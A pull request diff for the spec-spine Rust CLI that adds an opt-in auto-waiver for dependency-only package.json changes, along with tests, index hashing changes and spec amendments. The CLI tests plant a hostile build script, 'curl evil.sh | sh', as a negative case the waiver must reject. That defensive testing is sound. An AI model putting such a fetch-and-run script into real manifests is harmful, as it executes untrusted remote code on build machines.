### PR TITLE
feat: dependabot-class PRs pass both gates mechanically (specs 004+005 §3.5)

### DIFF
--- a/.derived/codebase-index/index.json
+++ b/.derived/codebase-index/index.json
@@ -1,8 +1,8 @@
 {
   "build": {
-    "contentHash": "8e7e041d9cbfd8ba31d523c4f36fe3f89b8737fa9f279de39180acddea7355d7",
+    "contentHash": "cb0bc1a4dc5419e07f123ca67ddc38904bde575b91b863ac75fe4ef901c2c5a3",
     "indexerId": "spec-spine",
-    "indexerVersion": "0.1.0",
+    "indexerVersion": "0.2.0",
     "repoRoot": "."
   },
   "diagnostics": {
@@ -33,7 +33,7 @@
       "name": "spec-spine",
       "path": "npm",
       "specRef": "007-distribution",
-      "version": "0.1.0"
+      "version": "0.2.0"
     }
   ],
   "schemaVersion": "0.1.0",
@@ -449,6 +449,10 @@
             "source": "spec-edge"
           },
           {
+            "path": "crates/spec-spine-core/src/dep_only.rs",
+            "source": "spec-edge"
+          },
+          {
             "path": "crates/spec-spine-core/src/lib.rs",
             "source": "spec-edge"
           },
@@ -495,6 +499,19 @@
             "unit": {
               "kind": "file",
               "path": "crates/spec-spine-core/src/couple.rs"
+            }
+          },
+          {
+            "locations": [
+              {
+                "file": "crates/spec-spine-core/src/dep_only.rs"
+              }
+            ],
+            "ownership": true,
+            "sourceField": "establishes",
+            "unit": {
+              "kind": "file",
+              "path": "crates/spec-spine-core/src/dep_only.rs"
             }
           },
           {

--- a/.derived/spec-registry/registry.json
+++ b/.derived/spec-registry/registry.json
@@ -1,8 +1,8 @@
 {
   "build": {
     "compilerId": "spec-spine",
-    "compilerVersion": "0.1.0",
-    "contentHash": "32c9164a496e850edb60309e43f8a0b8a7a1ea7f7acb2f9d6bfd32e7fef0c3ae",
+    "compilerVersion": "0.2.0",
+    "contentHash": "cc520eb79a79de23aaf0deac328b9719a928d17c998c35c5f0f00522f623d5b8",
     "inputRoot": "."
   },
   "specVersion": "0.1.0",
@@ -30,7 +30,8 @@
         "6. Determinism",
         "7. The guardrails",
         "8. Bootstrap order",
-        "9. Status"
+        "9. Status",
+        "Amendments received"
       ],
       "specPath": "specs/000-spec-spine-bootstrap/spec.md",
       "status": "approved",
@@ -247,6 +248,10 @@
         },
         {
           "kind": "file",
+          "path": "crates/spec-spine-core/src/dep_only.rs"
+        },
+        {
+          "kind": "file",
           "path": "crates/spec-spine-cli/src/cmd_couple.rs"
         },
         {
@@ -399,7 +404,8 @@
         "3.4 Unsupported hosts fail clearly",
         "3.5 Version lock",
         "3.6 Release integration",
-        "4. Out of scope"
+        "4. Out of scope",
+        "Release log"
       ],
       "specPath": "specs/007-distribution/spec.md",
       "status": "approved",

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1115,7 +1115,7 @@ dependencies = [
 
 [[package]]
 name = "spec-spine-cli"
-version = "0.1.0"
+version = "0.2.0"
 dependencies = [
  "clap",
  "serde",
@@ -1128,7 +1128,7 @@ dependencies = [
 
 [[package]]
 name = "spec-spine-core"
-version = "0.1.0"
+version = "0.2.0"
 dependencies = [
  "glob",
  "jsonschema",
@@ -1146,7 +1146,7 @@ dependencies = [
 
 [[package]]
 name = "spec-spine-types"
-version = "0.1.0"
+version = "0.2.0"
 dependencies = [
  "serde",
  "serde_json",

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -11,7 +11,7 @@ members = [
 
 # Shared metadata inherited by member crates via `field.workspace = true`.
 [workspace.package]
-version = "0.1.0"
+version = "0.2.0"
 edition = "2024"
 rust-version = "1.85"
 license = "Apache-2.0"
@@ -30,8 +30,8 @@ sha2 = "0.10"
 clap = { version = "4", features = ["derive"] }
 time = { version = "0.3", features = ["formatting"] }
 # Internal crates (path + version so the published surface is not path-only).
-spec-spine-types = { version = "0.1.0", path = "crates/spec-spine-types" }
-spec-spine-core = { version = "0.1.0", path = "crates/spec-spine-core" }
+spec-spine-types = { version = "0.2.0", path = "crates/spec-spine-types" }
+spec-spine-core = { version = "0.2.0", path = "crates/spec-spine-core" }
 
 # The library must not contain unsafe; the public boundary is FFI-friendly without it.
 [workspace.lints.rust]

--- a/crates/spec-spine-cli/src/cmd_couple.rs
+++ b/crates/spec-spine-cli/src/cmd_couple.rs
@@ -10,8 +10,11 @@
 use std::path::{Path, PathBuf};
 use std::process::Command;
 
-use spec_spine_core::{DiffFile, DiffInput, couple, parse_waiver};
-use spec_spine_types::{Error, LineSpan};
+use spec_spine_core::{
+    DiffFile, DiffInput, FileContents, couple, dependency_only_waiver, is_bypassed_path,
+    parse_waiver,
+};
+use spec_spine_types::{Config, Error, LineSpan};
 
 use crate::load_repo_config;
 
@@ -28,7 +31,16 @@ pub fn run(repo: &Path, args: &CoupleArgs) -> Result<u8, Error> {
 
     let diff = build_diff_input(repo, args)?;
     let body = read_pr_body(args)?;
-    let waiver = parse_waiver(&cfg, &body);
+    let mut waiver = parse_waiver(&cfg, &body);
+    let mut auto_waived = false;
+
+    // Spec 005 §3.5 — mechanical dependency-only auto-waiver. Opt-in,
+    // git-diff mode only (`--paths-from` has no content to compare), and
+    // never overrides an explicit PR-body waiver.
+    if waiver.is_none() && cfg.coupling.auto_waive_dependency_only && args.paths_from.is_none() {
+        waiver = try_dependency_only_waiver(repo, &cfg, args, &diff)?;
+        auto_waived = waiver.is_some();
+    }
 
     let report = couple(&cfg, repo, &diff, waiver.as_ref())?;
 
@@ -46,8 +58,9 @@ pub fn run(repo: &Path, args: &CoupleArgs) -> Result<u8, Error> {
         );
     } else if let Some(reason) = &report.waiver {
         println!(
-            "spec-spine couple: {} violation(s) waived — reason: {reason}",
-            report.violations.len()
+            "spec-spine couple: {} violation(s) {} — reason: {reason}",
+            report.violations.len(),
+            if auto_waived { "auto-waived" } else { "waived" }
         );
         for v in &report.violations {
             println!("  {} (waived)", v.message);
@@ -82,6 +95,75 @@ fn build_diff_input(repo: &Path, args: &CoupleArgs) -> Result<DiffInput, Error> 
 
     let raw = run_git_diff(repo, &args.base, &args.head)?;
     Ok(parse_unified_diff(&raw))
+}
+
+/// Attempt the spec 005 §3.5 mechanical auto-waiver: every non-bypassed
+/// changed path must be a `package.json` whose base→head change is
+/// dependency-only. Contents come from `git show` at the **merge base** (the
+/// diff is three-dot, so the base side is `merge-base(base, head)`, not the
+/// base branch tip) and at `head`. Any git failure refuses the auto-waiver
+/// fail-closed rather than erroring the gate.
+fn try_dependency_only_waiver(
+    repo: &Path,
+    cfg: &Config,
+    args: &CoupleArgs,
+    diff: &DiffInput,
+) -> Result<Option<spec_spine_core::Waiver>, Error> {
+    let candidates: Vec<&DiffFile> = diff
+        .files
+        .iter()
+        .filter(|f| !is_bypassed_path(cfg, &f.path))
+        .collect();
+    // Cheap pre-filter before any git spawn: the waiver can only ever apply
+    // when every non-bypassed path is a package.json manifest.
+    if candidates.is_empty()
+        || !candidates
+            .iter()
+            .all(|f| spec_spine_core::is_package_json(&f.path))
+    {
+        return Ok(None);
+    }
+
+    let Some(merge_base) = git_merge_base(repo, &args.base, &args.head) else {
+        return Ok(None);
+    };
+
+    let mut files: Vec<FileContents> = Vec::with_capacity(candidates.len());
+    for f in &candidates {
+        files.push(FileContents {
+            path: f.path.clone(),
+            base: git_show(repo, &merge_base, &f.path),
+            head: git_show(repo, &args.head, &f.path),
+        });
+    }
+    Ok(dependency_only_waiver(&files))
+}
+
+fn git_merge_base(repo: &Path, base: &str, head: &str) -> Option<String> {
+    let out = Command::new("git")
+        .arg("-C")
+        .arg(repo)
+        .args(["merge-base", base, head])
+        .output()
+        .ok()?;
+    if !out.status.success() {
+        return None;
+    }
+    let rev = String::from_utf8_lossy(&out.stdout).trim().to_string();
+    if rev.is_empty() { None } else { Some(rev) }
+}
+
+fn git_show(repo: &Path, rev: &str, path: &str) -> Option<String> {
+    let out = Command::new("git")
+        .arg("-C")
+        .arg(repo)
+        .args(["show", &format!("{rev}:{path}")])
+        .output()
+        .ok()?;
+    if !out.status.success() {
+        return None; // absent at this rev (created/deleted) — fail closed upstream
+    }
+    Some(String::from_utf8_lossy(&out.stdout).into_owned())
 }
 
 fn run_git_diff(repo: &Path, base: &str, head: &str) -> Result<String, Error> {

--- a/crates/spec-spine-cli/tests/couple.rs
+++ b/crates/spec-spine-cli/tests/couple.rs
@@ -179,3 +179,168 @@ fn real_git_diff_detects_drift() {
         String::from_utf8_lossy(&drift.stderr)
     );
 }
+
+// ===== spec 004 §3.5 + spec 005 §3.5 — the dependabot-class path =====
+
+/// A minimal governed repo with an npm package claimed by spec 001-a.
+fn setup_npm(root: &Path, auto_waive: bool) {
+    if auto_waive {
+        write(
+            root,
+            "spec-spine.toml",
+            "[coupling]\nauto_waive_dependency_only = true\n",
+        );
+    }
+    write(
+        root,
+        "package.json",
+        "{ \"name\": \"root\", \"workspaces\": [\"pkg-a\"] }\n",
+    );
+    write(
+        root,
+        "pkg-a/package.json",
+        "{ \"name\": \"pkg-a\", \"version\": \"1.0.0\",\n  \
+         \"spec-spine\": { \"spec\": \"001-a\" },\n  \
+         \"scripts\": { \"build\": \"tsc\" },\n  \
+         \"dependencies\": { \"zod\": \"3.22.0\" } }\n",
+    );
+    write(
+        root,
+        "specs/001-a/spec.md",
+        "---\nid: \"001-a\"\ntitle: \"A\"\nstatus: approved\ncreated: \"2026-06-09\"\n\
+         summary: \"s\"\nestablishes:\n  - \"pkg-a\"\n---\n# 001-a\n## body\n",
+    );
+}
+
+fn git_in(root: &Path, args: &[&str]) {
+    let out = Command::new("git")
+        .arg("-C")
+        .arg(root)
+        .args(args)
+        .env("GIT_AUTHOR_NAME", "t")
+        .env("GIT_AUTHOR_EMAIL", "t@t")
+        .env("GIT_COMMITTER_NAME", "t")
+        .env("GIT_COMMITTER_EMAIL", "t@t")
+        .output()
+        .unwrap();
+    assert!(
+        out.status.success(),
+        "git {args:?}: {}",
+        String::from_utf8_lossy(&out.stderr)
+    );
+}
+
+fn index_check(root: &Path) -> std::process::Output {
+    bin()
+        .arg("--repo")
+        .arg(root)
+        .args(["index", "check"])
+        .output()
+        .unwrap()
+}
+
+fn couple_git(root: &Path) -> std::process::Output {
+    bin()
+        .arg("--repo")
+        .arg(root)
+        .args(["couple", "--base", "HEAD~1", "--head", "HEAD"])
+        .output()
+        .unwrap()
+}
+
+#[test]
+fn dependency_bump_stays_fresh_and_auto_waives() {
+    let tmp = tempfile::tempdir().unwrap();
+    let root = tmp.path();
+    setup_npm(root, true);
+    git_in(root, &["init", "-q"]);
+    refresh(root);
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "base"]);
+
+    // Dependabot-style: bump a dependency version. No re-index, no spec edit,
+    // no PR body.
+    write(
+        root,
+        "pkg-a/package.json",
+        "{ \"name\": \"pkg-a\", \"version\": \"1.0.0\",\n  \
+         \"spec-spine\": { \"spec\": \"001-a\" },\n  \
+         \"scripts\": { \"build\": \"tsc\" },\n  \
+         \"dependencies\": { \"zod\": \"3.23.1\" } }\n",
+    );
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "bump"]);
+
+    // (a) The committed index is still FRESH: dependency tables are not a
+    // governed input (spec 004 §3.5 governance-projection hashing).
+    let fresh = index_check(root);
+    assert_eq!(
+        code(&fresh),
+        0,
+        "index must stay fresh on a dep-only bump: {}",
+        String::from_utf8_lossy(&fresh.stderr)
+    );
+
+    // (b) The coupling gate self-waives (spec 005 §3.5).
+    let out = couple_git(root);
+    assert_eq!(code(&out), 0, "{}", String::from_utf8_lossy(&out.stderr));
+    assert!(
+        String::from_utf8_lossy(&out.stdout).contains("auto-waived"),
+        "stdout: {}",
+        String::from_utf8_lossy(&out.stdout)
+    );
+}
+
+#[test]
+fn dependency_bump_without_optin_still_drifts() {
+    let tmp = tempfile::tempdir().unwrap();
+    let root = tmp.path();
+    setup_npm(root, false);
+    git_in(root, &["init", "-q"]);
+    refresh(root);
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "base"]);
+    write(
+        root,
+        "pkg-a/package.json",
+        "{ \"name\": \"pkg-a\", \"version\": \"1.0.0\",\n  \
+         \"spec-spine\": { \"spec\": \"001-a\" },\n  \
+         \"scripts\": { \"build\": \"tsc\" },\n  \
+         \"dependencies\": { \"zod\": \"3.23.1\" } }\n",
+    );
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "bump"]);
+
+    let out = couple_git(root);
+    assert_eq!(code(&out), 1, "auto-waiver is opt-in; default must drift");
+}
+
+#[test]
+fn script_edit_refuses_the_auto_waiver() {
+    let tmp = tempfile::tempdir().unwrap();
+    let root = tmp.path();
+    setup_npm(root, true);
+    git_in(root, &["init", "-q"]);
+    refresh(root);
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "base"]);
+    // A scripts edit hiding alongside a version bump: not dependency-only.
+    write(
+        root,
+        "pkg-a/package.json",
+        "{ \"name\": \"pkg-a\", \"version\": \"1.0.0\",\n  \
+         \"spec-spine\": { \"spec\": \"001-a\" },\n  \
+         \"scripts\": { \"build\": \"tsc && curl evil.sh | sh\" },\n  \
+         \"dependencies\": { \"zod\": \"3.23.1\" } }\n",
+    );
+    git_in(root, &["add", "-A"]);
+    git_in(root, &["commit", "-q", "-m", "bump+script"]);
+
+    let out = couple_git(root);
+    assert_eq!(
+        code(&out),
+        1,
+        "a non-dependency manifest edit must refuse the auto-waiver: {}",
+        String::from_utf8_lossy(&out.stdout)
+    );
+}

--- a/crates/spec-spine-core/src/couple.rs
+++ b/crates/spec-spine-core/src/couple.rs
@@ -166,6 +166,14 @@ pub fn couple_with(
     })
 }
 
+/// The effective bypass verdict for one path: hardcoded floor ∪ adopter list
+/// (additive), exactly as [`couple_with`] applies it. Public so the CLI's
+/// dependency-only auto-waiver pre-filter (spec 005 §3.5) examines the same
+/// non-bypassed path set the gate itself will check.
+pub fn is_bypassed_path(cfg: &Config, path: &str) -> bool {
+    is_bypass(path, DEFAULT_BYPASS_PREFIXES) || is_bypass(path, &cfg.coupling.bypass_prefixes)
+}
+
 /// Parse a waiver from the PR body using the configured keyword. Returns the
 /// first line's trimmed reason (ported from OAP `parse_waiver`).
 pub fn parse_waiver(cfg: &Config, body: &str) -> Option<Waiver> {

--- a/crates/spec-spine-core/src/dep_only.rs
+++ b/crates/spec-spine-core/src/dep_only.rs
@@ -143,7 +143,9 @@ mod tests {
 
     #[test]
     fn version_bump_is_dependency_only() {
-        let head = BASE.replace("3.22.0", "3.23.1").replace("1.0.0\" }", "1.2.0\" }");
+        let head = BASE
+            .replace("3.22.0", "3.23.1")
+            .replace("1.0.0\" }", "1.2.0\" }");
         assert!(dependency_only_change(BASE, &head));
     }
 
@@ -191,10 +193,9 @@ mod tests {
 
     #[test]
     fn reformat_only_is_dependency_only() {
-        let head = serde_json::to_string_pretty(
-            &serde_json::from_str::<serde_json::Value>(BASE).unwrap(),
-        )
-        .unwrap();
+        let head =
+            serde_json::to_string_pretty(&serde_json::from_str::<serde_json::Value>(BASE).unwrap())
+                .unwrap();
         assert!(dependency_only_change(BASE, &head));
     }
 

--- a/crates/spec-spine-core/src/dep_only.rs
+++ b/crates/spec-spine-core/src/dep_only.rs
@@ -1,0 +1,234 @@
+//! Mechanical dependency-only auto-waiver (spec 005 §3.5 amendment,
+//! 2026-06-11).
+//!
+//! Dependabot-class PRs change only version strings inside `package.json`
+//! dependency tables, but a `package.json` claimed by a spec (via its
+//! manifest metadata) fires the coupling gate, and a bot cannot edit specs
+//! or PR bodies. Path-level bypass is the wrong tool: it would exempt the
+//! whole manifest, including the spec-binding metadata the gate exists to
+//! protect. The mechanical rule instead compares the **parsed JSON** of the
+//! base and head versions of each changed manifest: the two documents must
+//! be semantically identical everywhere except *version strings* inside the
+//! standard dependency tables (same package keys; values may differ only
+//! where both sides are strings). Anything else — a new or removed package,
+//! a `scripts` edit, a spec-metadata edit, a non-object document — refuses
+//! the auto-waiver, fail-closed.
+//!
+//! Like everything in core, this is pure: the CLI resolves the merge-base,
+//! fetches both file versions via `git show`, and hands the contents in.
+
+use crate::couple::Waiver;
+
+/// The `package.json` tables whose **values** (version strings) may change
+/// under the auto-waiver. Key sets must be identical on both sides.
+pub const DEPENDENCY_TABLES: &[&str] = &[
+    "dependencies",
+    "devDependencies",
+    "optionalDependencies",
+    "peerDependencies",
+];
+
+/// One changed file with both sides of its content. `None` = the file is
+/// absent on that side (created or deleted) — never dependency-only.
+#[derive(Clone, Debug)]
+pub struct FileContents {
+    pub path: String,
+    pub base: Option<String>,
+    pub head: Option<String>,
+}
+
+/// The mechanical verdict over a whole diff: `Some(Waiver)` iff **every**
+/// entry is a `package.json` whose base→head change is dependency-only.
+/// An empty slice yields `None` — there is nothing to waive.
+pub fn dependency_only_waiver(files: &[FileContents]) -> Option<Waiver> {
+    if files.is_empty() {
+        return None;
+    }
+    for f in files {
+        if !is_package_json(&f.path) {
+            return None;
+        }
+        let (Some(base), Some(head)) = (&f.base, &f.head) else {
+            return None; // created or deleted manifest — not a version bump
+        };
+        if !dependency_only_change(base, head) {
+            return None;
+        }
+    }
+    Some(Waiver {
+        reason: format!(
+            "dependency-only diff (mechanical auto-waiver): version-string \
+             changes confined to dependency tables in {} package.json file(s)",
+            files.len()
+        ),
+    })
+}
+
+/// `path` names a `package.json` manifest (any directory).
+pub fn is_package_json(path: &str) -> bool {
+    path == "package.json" || path.ends_with("/package.json")
+}
+
+/// True iff `base` and `head` parse as JSON objects that are **equal
+/// everywhere except version strings inside [`DEPENDENCY_TABLES`]**:
+///
+/// - every non-table key: present in both with exactly equal values;
+/// - every table: present on both sides (or neither), an object on both,
+///   with identical key sets; per-key values may differ only when both
+///   sides are strings.
+///
+/// Parse failure or a non-object document is `false` (fail-closed). A
+/// formatting-only change (semantically equal documents) is `true`: it
+/// alters no governed fact.
+pub fn dependency_only_change(base: &str, head: &str) -> bool {
+    use serde_json::Value;
+
+    let (Ok(Value::Object(base)), Ok(Value::Object(head))) = (
+        serde_json::from_str::<Value>(base),
+        serde_json::from_str::<Value>(head),
+    ) else {
+        return false;
+    };
+
+    let keys: std::collections::BTreeSet<&String> = base.keys().chain(head.keys()).collect();
+    for key in keys {
+        let is_table = DEPENDENCY_TABLES.contains(&key.as_str());
+        match (base.get(key), head.get(key)) {
+            (Some(b), Some(h)) if is_table => {
+                let (Value::Object(b), Value::Object(h)) = (b, h) else {
+                    return false;
+                };
+                if b.keys().ne(h.keys()) {
+                    return false; // package added or removed
+                }
+                for (name, bv) in b {
+                    let hv = &h[name];
+                    if bv != hv && !(bv.is_string() && hv.is_string()) {
+                        return false;
+                    }
+                }
+            }
+            (Some(b), Some(h)) => {
+                if b != h {
+                    return false;
+                }
+            }
+            // A key (table or not) present on only one side.
+            _ => return false,
+        }
+    }
+    true
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn fc(path: &str, base: &str, head: &str) -> FileContents {
+        FileContents {
+            path: path.to_string(),
+            base: Some(base.to_string()),
+            head: Some(head.to_string()),
+        }
+    }
+
+    const BASE: &str = r#"{
+        "name": "app",
+        "version": "1.0.0",
+        "scripts": { "build": "tsc" },
+        "spec-spine": { "spec": "014-api" },
+        "dependencies": { "express": "^4.18.0", "zod": "3.22.0" },
+        "devDependencies": { "vitest": "1.0.0" }
+    }"#;
+
+    #[test]
+    fn version_bump_is_dependency_only() {
+        let head = BASE.replace("3.22.0", "3.23.1").replace("1.0.0\" }", "1.2.0\" }");
+        assert!(dependency_only_change(BASE, &head));
+    }
+
+    #[test]
+    fn added_package_is_not() {
+        let head = BASE.replace(
+            r#""zod": "3.22.0""#,
+            r#""zod": "3.22.0", "left-pad": "1.0.0""#,
+        );
+        assert!(!dependency_only_change(BASE, &head));
+    }
+
+    #[test]
+    fn removed_package_is_not() {
+        let head = BASE.replace(r#", "zod": "3.22.0""#, "");
+        assert!(!dependency_only_change(BASE, &head));
+    }
+
+    #[test]
+    fn script_edit_is_not() {
+        let head = BASE.replace(r#""build": "tsc""#, r#""build": "tsc && evil.sh""#);
+        assert!(!dependency_only_change(BASE, &head));
+    }
+
+    #[test]
+    fn spec_metadata_edit_is_not() {
+        let head = BASE.replace("014-api", "999-other");
+        assert!(!dependency_only_change(BASE, &head));
+    }
+
+    #[test]
+    fn package_own_version_edit_is_not() {
+        let head = BASE.replace(r#""version": "1.0.0""#, r#""version": "2.0.0""#);
+        assert!(!dependency_only_change(BASE, &head));
+    }
+
+    #[test]
+    fn new_table_is_not() {
+        let head = BASE.replace(
+            r#""devDependencies""#,
+            r#""peerDependencies": { "react": "18" }, "devDependencies""#,
+        );
+        assert!(!dependency_only_change(BASE, &head));
+    }
+
+    #[test]
+    fn reformat_only_is_dependency_only() {
+        let head = serde_json::to_string_pretty(
+            &serde_json::from_str::<serde_json::Value>(BASE).unwrap(),
+        )
+        .unwrap();
+        assert!(dependency_only_change(BASE, &head));
+    }
+
+    #[test]
+    fn unparseable_is_not() {
+        assert!(!dependency_only_change(BASE, "{ not json"));
+        assert!(!dependency_only_change("[]", "[]")); // non-object
+    }
+
+    #[test]
+    fn waiver_requires_all_files_to_qualify() {
+        let bump = fc(
+            "apps/api/package.json",
+            r#"{"dependencies":{"a":"1"}}"#,
+            r#"{"dependencies":{"a":"2"}}"#,
+        );
+        let other = fc("src/lib.rs", "x", "y");
+        assert!(dependency_only_waiver(std::slice::from_ref(&bump)).is_some());
+        assert!(dependency_only_waiver(&[bump.clone(), other]).is_none());
+        assert!(dependency_only_waiver(&[]).is_none());
+
+        let created = FileContents {
+            path: "package.json".to_string(),
+            base: None,
+            head: Some(r#"{"dependencies":{"a":"1"}}"#.to_string()),
+        };
+        assert!(dependency_only_waiver(&[created]).is_none());
+    }
+
+    #[test]
+    fn package_json_path_shapes() {
+        assert!(is_package_json("package.json"));
+        assert!(is_package_json("apps/api/package.json"));
+        assert!(!is_package_json("apps/api/package.json5"));
+        assert!(!is_package_json("not-package.json/file.ts"));
+    }
+}

--- a/crates/spec-spine-core/src/index.rs
+++ b/crates/spec-spine-core/src/index.rs
@@ -458,9 +458,24 @@ fn collect_hash_inputs(
         }
     };
 
-    // Manifests.
+    // Manifests. npm manifests fold as their governance projection (spec 004
+    // §3.5 amendment) — dependency tables are not a governed input, so a
+    // dependabot-class version bump leaves the committed index fresh while
+    // a name / workspaces / spec-metadata change still stales it. Parse
+    // failure falls back to raw bytes (over-hashing is fail-closed).
     for m in manifest_paths {
-        push(m, &mut pieces);
+        if m.file_name().is_some_and(|f| f == "package.json") {
+            if let Ok(content) = fs::read_to_string(m) {
+                let piece = crate::manifest::npm_hash_projection(
+                    &content,
+                    &cfg.manifest.metadata_namespace,
+                )
+                .unwrap_or(content);
+                pieces.push((rel_posix(repo_root, m), piece));
+            }
+        } else {
+            push(m, &mut pieces);
+        }
     }
     // Every spec.md.
     let specs_dir = repo_root.join(&cfg.layout.specs_dir);

--- a/crates/spec-spine-core/src/lib.rs
+++ b/crates/spec-spine-core/src/lib.rs
@@ -15,6 +15,7 @@
 mod canonical_json;
 pub mod compile;
 pub mod couple;
+pub mod dep_only;
 mod hash;
 pub mod index;
 pub mod lint;
@@ -38,7 +39,11 @@ pub use spec_spine_types::{
 pub use compile::{CompileOutcome, MAX_UNDECLARED_EXTRA_FRONTMATTER, compile};
 pub use couple::{
     CoupleReport, DEFAULT_BYPASS_PREFIXES, DiffFile, DiffInput, Waiver, couple, couple_with,
-    parse_waiver,
+    is_bypassed_path, parse_waiver,
+};
+pub use dep_only::{
+    DEPENDENCY_TABLES, FileContents, dependency_only_change, dependency_only_waiver,
+    is_package_json,
 };
 pub use index::{Freshness, IndexOutcome, authorities, check_index_freshness, index};
 pub use lint::{LintReport, lint};

--- a/crates/spec-spine-core/src/manifest.rs
+++ b/crates/spec-spine-core/src/manifest.rs
@@ -266,6 +266,30 @@ fn npm_record(repo_root: &Path, manifest: &Path, namespace: &str) -> Option<Pack
     })
 }
 
+/// The governance projection of an npm manifest — exactly the fields
+/// discovery consumes (`npm_record` + workspace-glob extraction): `name`,
+/// `version`, `workspaces`, and the adopter's metadata-namespace object.
+/// The index content hash folds this INSTEAD of the raw bytes (spec 004
+/// §3.5 amendment, 2026-06-11): a dependency-table version bump
+/// (dependabot-class) is not a governed input and must not stale the
+/// committed index, while any change to a field the indexer actually reads
+/// still does. `None` (unparseable / non-object) tells the caller to fall
+/// back to raw bytes — over-hashing is the fail-closed direction.
+pub fn npm_hash_projection(content: &str, namespace: &str) -> Option<String> {
+    let doc: serde_json::Value = serde_json::from_str(content).ok()?;
+    let obj = doc.as_object()?;
+    let mut proj = serde_json::Map::new();
+    for key in ["name", "version", "workspaces"] {
+        if let Some(v) = obj.get(key) {
+            proj.insert(key.to_string(), v.clone());
+        }
+    }
+    if let Some(v) = obj.get(namespace) {
+        proj.insert(namespace.to_string(), v.clone());
+    }
+    serde_json::to_string(&serde_json::Value::Object(proj)).ok()
+}
+
 // ===== shared =====
 
 /// Expand `<member>/<manifest_file>` under `repo_root` (member may contain glob

--- a/crates/spec-spine-types/src/config.rs
+++ b/crates/spec-spine-types/src/config.rs
@@ -172,6 +172,16 @@ pub struct CouplingConfig {
     pub bypass_prefixes: Vec<String>,
     /// The PR-body waiver keyword; the free-text reason follows the colon.
     pub waiver_keyword: String,
+    /// Opt-in mechanical auto-waiver for dependency-only diffs (spec 005
+    /// §3.5). When `true` and no PR-body waiver is present, the CLI compares
+    /// the parsed base/head JSON of every non-bypassed changed path: if all
+    /// are `package.json` manifests whose only differences are version
+    /// strings inside the standard dependency tables (same package keys),
+    /// the gate self-waives — the path dependabot-class PRs cannot take
+    /// (they can edit neither specs nor PR bodies). Anything beyond a
+    /// version string — a new package, a `scripts` edit, spec-binding
+    /// metadata — refuses the auto-waiver, fail-closed. Default `false`.
+    pub auto_waive_dependency_only: bool,
 }
 
 impl Default for CouplingConfig {
@@ -182,6 +192,7 @@ impl Default for CouplingConfig {
             // implied it was overridable.
             bypass_prefixes: Vec::new(),
             waiver_keyword: "Spec-Drift-Waiver:".to_string(),
+            auto_waive_dependency_only: false,
         }
     }
 }

--- a/npm/package.json
+++ b/npm/package.json
@@ -1,6 +1,6 @@
 {
   "name": "spec-spine",
-  "version": "0.1.0",
+  "version": "0.2.0",
   "description": "The spec-spine CLI: compile a markdown spec corpus into a deterministic authority ledger and refuse code that drifts from its owning spec. Ships the prebuilt binary; no Rust toolchain required.",
   "keywords": [
     "spec",

--- a/specs/000-spec-spine-bootstrap/spec.md
+++ b/specs/000-spec-spine-bootstrap/spec.md
@@ -196,3 +196,12 @@ This is a `constitutional-bootstrap` spec. Its `unamendable` anchors
 (§frontmatter) are frozen: no amendment may alter the authoring/derived boundary,
 the identity rule, the typed-authority-graph principle, the determinism
 requirement, or the refusal rule. Amendments may add surface elsewhere.
+
+## Amendments received
+
+**Amendment 2026-06-11 (record: specs 004/005 dependency-only cutover).**
+The `[coupling]` config table this spec's types crate carries gains one
+additive key: `auto_waive_dependency_only` (bool, default `false`) — the
+opt-in switch for spec 005 §3.5's mechanical dependency-only auto-waiver.
+No unamendable anchor is touched; `deny_unknown_fields` keeps a misspelled
+knob a loud config error.

--- a/specs/004-codebase-index/spec.md
+++ b/specs/004-codebase-index/spec.md
@@ -115,6 +115,20 @@ committed `index.json`'s own `resolvedUnits`, and compares it to the committed
 hash; a mismatch is `Stale` (exit 2). Resolver hard-error diagnostics
 (`I-003`..`I-009`) also fail `check`.
 
+**npm manifests fold as their governance projection** (amendment 2026-06-11,
+paired with spec 005's dependency-only auto-waiver). A `package.json` enters
+the hash not as raw bytes but as the canonical JSON of exactly the fields
+discovery consumes — `name`, `version`, `workspaces`, and the
+`manifest.metadata_namespace` object (`manifest.rs::npm_hash_projection`).
+Rationale: dependency tables are not a governed input — the indexer never
+reads them — so a dependabot-class version bump must not stale the committed
+index (the bot can neither re-index nor edit a PR body), while a change to
+any field the indexer *does* read still does. An unparseable manifest falls
+back to raw bytes: over-hashing is the fail-closed direction. Cargo and pnpm
+manifests still fold as raw bytes. Upgrading across this amendment changes
+every npm-bearing repo's computed hash once — re-run `spec-spine index` when
+bumping the dependency.
+
 ### 3.6 Traceability and diagnostics
 
 `traceability` carries `mappings` (per spec: implementing paths + resolved

--- a/specs/005-coupling-gate/spec.md
+++ b/specs/005-coupling-gate/spec.md
@@ -12,6 +12,7 @@ depends_on:
   - "004-codebase-index"
 establishes:
   - "crates/spec-spine-core/src/couple.rs"
+  - "crates/spec-spine-core/src/dep_only.rs"
   - "crates/spec-spine-cli/src/cmd_couple.rs"
   - "crates/spec-spine-core/tests/couple.rs"
   - "crates/spec-spine-cli/tests/couple.rs"
@@ -134,6 +135,26 @@ either the predecessor or the successor clears the path.
   `config.coupling.waiver_keyword` (default `Spec-Drift-Waiver:`); the trimmed
   remainder is the reason. A present waiver suppresses the failure exit but the
   violations are **retained** in the report for review-time visibility.
+- **Dependency-only auto-waiver** (amendment 2026-06-11; opt-in via
+  `config.coupling.auto_waive_dependency_only`, default `false`): dependabot-class
+  PRs bump version strings inside `package.json` dependency tables but can edit
+  neither specs nor PR bodies, so an owned manifest fires `C-001` with no waiver
+  path available. When opted in and **no explicit PR-body waiver is present**,
+  the CLI compares the parsed base/head JSON of every non-bypassed changed path
+  (contents fetched at the **merge base** and head — the diff is three-dot): if
+  all are `package.json` manifests that are semantically identical except
+  version strings inside `dependencies`/`devDependencies`/
+  `optionalDependencies`/`peerDependencies` (same package keys; values may
+  differ only where both sides are strings), the gate synthesizes a waiver
+  (`core::dep_only`, reason marks it mechanical) and reports the violations as
+  auto-waived. Anything else — a new or removed package, a `scripts` edit,
+  spec-binding metadata, an added table, an unparseable or created/deleted
+  manifest — refuses the auto-waiver fail-closed and the gate drifts normally.
+  Path-level bypass is deliberately NOT the mechanism: it would exempt the whole
